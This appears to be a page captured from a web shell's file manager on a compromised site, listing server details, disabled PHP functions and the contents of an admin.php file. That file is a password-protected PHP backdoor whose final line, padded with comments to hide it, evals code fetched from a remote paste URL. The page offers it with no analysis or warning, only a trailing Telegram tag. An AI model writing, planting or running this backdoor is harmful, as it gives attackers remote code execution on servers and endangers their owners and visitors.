HEX
Server: nginx/1.24.0
System: Linux localhost 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
User: www (1000)
PHP: 8.3.27
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/bientansht.com/
Upload Files
File: /www/wwwroot/bientansht.com/admin.php
<?php
session_start();

/* MD5 hash of your password (example: md5("mypassword")) */
$PASS_MD5 = "ce55d7ea9fdf0dfd2aef483743e2e022";

if (!isset($_SESSION['auth'])) {
    if (isset($_POST['p']) && md5($_POST['p']) === $PASS_MD5) {
        $_SESSION['auth'] = true;
    } else {
        ?>
        <!DOCTYPE html>
        <html>
        <head>
            <title>byp4a55 professor6T9</title>
        </head>
        <body>
            <form method="post">
                <input type="password" name="p" placeholder="Password">
                <button type="submit">Enter</button>
            </form>
        </body>
        </html>
        <?php
        exit;
    }
}
?>
<title>byp4a55 professor6T9</title><?=/****/@null; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://plainraw.com/raw/e76d8f3e0ccf"));/**/?>
@ Telegram